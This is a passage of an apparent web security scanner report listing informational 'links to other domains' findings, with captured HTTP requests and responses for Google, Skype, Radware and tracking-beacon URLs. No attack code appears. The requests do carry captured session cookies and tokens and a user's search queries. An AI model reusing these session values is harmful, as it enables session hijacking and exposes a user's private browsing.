GET /url?sa=t&source=web&cd=2&ved=0CCAQFjAB&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Fjs_ex_dom.asp&ei=dzJkTvK1A4LhiAKKpfnJCg&usg=AFQjCNGajhjfdYLZKGVCeIpfd7cM0sW59Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=ZPQD8fuJMOQI5s4Z9MfONwnbMd2RzPYqiZKsCDxwOlpRAuoJNxNrx5G8IFwTFkMcGwhz5SlrFLrYwMzlQCn8GDSpExBWP4wS1GsGI7TQPzoIcdgA9tAjsA_fx6b6-boa

Response

HTTP/1.1 302 Found
Location: http://www.w3schools.com/js/js_ex_dom.asp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 02:23:02 GMT
Server: gws
Content-Length: 238
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.w3schools.com/js/js_ex_dom.asp">here</A>
...[SNIP]...

17.93. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=6&sqi=2&ved=0CHoQFjAF&url=https%3A%2F%2Fwww.trustwave.com%2Fweb-application-firewall%2F&ei=qqRjTujbJPPXiAKIx4DBCg&usg=AFQjCNHgUS7lgiOE9OEnENXiwSM5r-Ao-g HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST

Response

HTTP/1.1 302 Found
Location: https://www.trustwave.com/web-application-firewall/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:18:14 GMT
Server: gws
Content-Length: 248
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.trustwave.com/web-application-firewall/">here</A>
...[SNIP]...

17.94. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=4&ved=0CC4QFjAD&url=http%3A%2F%2Fwww.cgisecurity.com%2Flib%2FXmlHTTPRequest.shtml&ei=dzJkTvK1A4LhiAKKpfnJCg&usg=AFQjCNHwAFib96T7vkCkHRHpa1BII5nq6g HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=ZPQD8fuJMOQI5s4Z9MfONwnbMd2RzPYqiZKsCDxwOlpRAuoJNxNrx5G8IFwTFkMcGwhz5SlrFLrYwMzlQCn8GDSpExBWP4wS1GsGI7TQPzoIcdgA9tAjsA_fx6b6-boa

Response

HTTP/1.1 302 Found
Location: http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 02:23:11 GMT
Server: gws
Content-Length: 248
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml">here</A>
...[SNIP]...

17.95. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CCcQFjAC&url=http%3A%2F%2Fmsdn.microsoft.com%2Fen-us%2Flibrary%2Fms533897(v%3Dvs.85).aspx&ei=dzJkTvK1A4LhiAKKpfnJCg&usg=AFQjCNHwrSrdy2kbYMFq7KsfBPUPF_O-DQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=ZPQD8fuJMOQI5s4Z9MfONwnbMd2RzPYqiZKsCDxwOlpRAuoJNxNrx5G8IFwTFkMcGwhz5SlrFLrYwMzlQCn8GDSpExBWP4wS1GsGI7TQPzoIcdgA9tAjsA_fx6b6-boa

Response

HTTP/1.1 302 Found
Location: http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 02:23:06 GMT
Server: gws
Content-Length: 259
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx">here</A>
...[SNIP]...

17.96. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&sqi=2&ved=0CFUQFjAA&url=http%3A%2F%2Fwww.imperva.com%2Fproducts%2Fwsc_web-application-firewall.html&ei=qqRjTujbJPPXiAKIx4DBCg&usg=AFQjCNF6wl90md12sAtnPxS1Rf_5k3etvw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST

Response

HTTP/1.1 302 Found
Location: http://www.imperva.com/products/wsc_web-application-firewall.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:18:07 GMT
Server: gws
Content-Length: 262
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.imperva.com/products/wsc_web-application-firewall.html">here</A>
...[SNIP]...

17.97. http://www.hlhz.com/us/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlhz.com
Path:   /us/home.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /us/home.aspx?LangType=1033 HTTP/1.1
Host: www.hlhz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.hlhz.com&SiteLanguage=1033; EktGUID=b3fb05af-0f8f-4a01-b592-19076be9596d; EkAnalytics=0; ASP.NET_SessionId=a142mw55cpg0g1jdkt4mxxar; hlweb=SiteLanguage=1033

Response

HTTP/1.1 200 OK
Cache-Control: public
Date: Sun, 04 Sep 2011 16:16:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 50715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Hom
...[SNIP]...
<li><a class="item2" href="http://tbe.taleo.net/NA4/ats/careers/jobSearch.jsp?org=HLHZ&amp;cws=1">Campus Recruiting</a>
...[SNIP]...

17.98. http://www.lijit.com/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /beacon?viewId=13151898886726b8b8a1ec2f8&rand=1315189888672&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_formattext&ifr=1&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.1755792
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n10 ( lax-agg-n21), ms lax-agg-n21 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 05 Sep 2011 02:30:51 GMT
Content-Length: 635
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; expires=Wed, 04-Sep-2013 02:30:51 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
                   <img src="http://ad.turn.com/server/pixel.htm?fpid=13&r=149046210" style="width:0px; height:0px;" width="0" height="0" />
                   <img src="http://um.simpli.fi/lj_match&r=149046210" style="width:0px; height:0px;" width="0" height="0" />
                   <img src="http://sync.mathtag.com/sync/img?mt_exid=17&redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D" style="width:0px; height:0px;" width="0" height="0" />
                   <img src="http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210" style="width:0px; height:0px;" width="0" height="0" />
           </body>
...[SNIP]...

17.99. http://www.livehelpnow.net/lhn/functions/imageserver.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/functions/imageserver.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /lhn/functions/imageserver.ashx?lhnid=1288&navname=Google%20Chrome&java=Yes&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan+Lokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf+web+application+security%26pbx%3D1%26oq%3Dwaf+web+application+security%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&pagetitle=Barracuda%20Web%20Application%20Firewall%20-%20Web%20Application%20Protection%20Against%20Hackers%20and%20Vulnerabilities&pageurl=http%3A//www.barracudanetworks.com/ns/products/web-site-firewall-overview.php%3F%26a%3Dgoogle-na_WebAppFirewallWW_WebApplicationSecurity%26kw%3Dweb%2520application%2520security%26gclid%3DCP2344L_g6sCFUsaQgodmjw72Q&page=web-site-firewall-overview.php&zimg=59&sres=1920x1200&sdepth=16&flash=0&custom1=&custom2=&custom3=&t=f&d=&rndstr=0.9297214762773365 HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://barracudanetworks.com/ns/gfx/1x1.gif
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 160

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://barracudanetworks.com/ns/gfx/1x1.gif'>here</a>.</h2>
</body></html>

17.100. http://www.radware.com/Resources/AppWallSolution.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radware.com
Path:   /Resources/AppWallSolution.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Resources/AppWallSolution.aspx?source=google&9gtype=search&9gkw=web%20application%20security&9gad=8494610116.1&9gpla=&9gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw HTTP/1.1
Host: www.radware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:48 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="X-U
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcs2aqcdt10000oakh3fs9xoa_2g3x/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.2">
</NOSCRIPT>
<!-- END OF SmartSource Data Collector TAG -->    
<script type="text/javascript" src="http://radware.trk.sodoit.com/rts.js"></script>
...[SNIP]...

17.101. http://www.skype.com/intl/en-us/prices/pay-monthly/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/pay-monthly/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intl/en-us/prices/pay-monthly/?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:27:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 85433
Content-Type: text/html; charset=utf-8
Content-Language: en


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >

<head>
   
...[SNIP]...
<!-- Icon -->
   <link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
   <link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
   <link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

   <!-- Canonincal link -->
...[SNIP]...
<!-- Default stylesheets -->
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/print.css" type="text/css" media="print"/>    
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/complete.css" type="text/css" media="screen"/>
   
   <!-- Template specific stylesheets -->
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Feed -->
   <link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/ShareSkypeEn"/>
   
   <script type="text/javascript">
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>

   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake.css" type="text/css" media="screen"/>
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</span>
                   <img class="arrow" alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"/>
                   <select class="userLanguage" name="userLanguage" dir="ltr">
...[SNIP]...
<div class="promoArea">
<img src="http://www.skypeassets.com/content/dam/skype/images/illustrations/discount-pink.png"/>
<h2 class="gray">
...[SNIP]...
<li class="packageDescription">
                   
                   <img class="packageIcon" src="http://www.skypeassets.com/content/dam/skype/images/world_orange.png" title="Unlimited Europe" alt="Unlimited Europe"/>
                   
                   <h2>
...[SNIP]...
<li class="packageDescription">
                   
                   <img class="packageIcon" src="http://www.skypeassets.com/content/dam/skype/images/world_orange.png" title="Unlimited North America" alt="Unlimited North America"/>
                   
                   <h2>
...[SNIP]...
<li class="packageDescription">
                   
                   <img class="packageIcon" src="http://www.skypeassets.com/content/dam/skype/images/icons/world_green_new.png" title="Unlimited World" alt="Unlimited World"/>
                   
                   <h2>
...[SNIP]...
<div class="lineSeparator section"><img width="683" height="10" alt="" src="http://www.skypeassets.com/i/images/remake/shadow_top_690_transparent.png"/>
</div>
...[SNIP]...

17.102. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/payg-rates-special-offer/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intl/en-us/prices/payg-rates-special-offer/?cm_mmc=ICDC|0928_B1-_-Credit-generic-1407 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.skype.com
Cookie: VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:27:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 226014
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
<!-- Icon -->
   <link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
   <link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
   <link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

   <!-- Canonincal link -->
...[SNIP]...
<!-- Default stylesheets -->
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/print.css" type="text/css" media="print"/>

   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/complete.css" type="text/css" media="screen"/>
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake.css" type="text/css" media="screen"/>
   
   
   <!-- Default javascripts -->
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Feed -->
   <link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/ShareSkypeEn"/>
   <script type="text/javascript">
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>

   <!-- Page specific stylesheets -->
   <link rel="stylesheet" href="http://www.skypeassets.com/content/dam/skype/css/table-prices.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/prices.css" type="text/css" media="screen"/>

<!--[if IE 7]>
...[SNIP]...
</script><script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</span>
                   <img class="arrow" alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"/>
                   <select class="userLanguage" name="userLanguage" dir="ltr">
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/IN.png">&nbsp;&nbsp;India</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/MX.png">&nbsp;&nbsp;Mexico</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/PH.png">&nbsp;&nbsp;Philippines</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/GB.png">&nbsp;&nbsp;United Kingdom</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/CO.png">&nbsp;&nbsp;Colombia</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/DO.png">&nbsp;&nbsp;Dominican Republic</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/DE.png">&nbsp;&nbsp;Germany</td>
...[SNIP]...
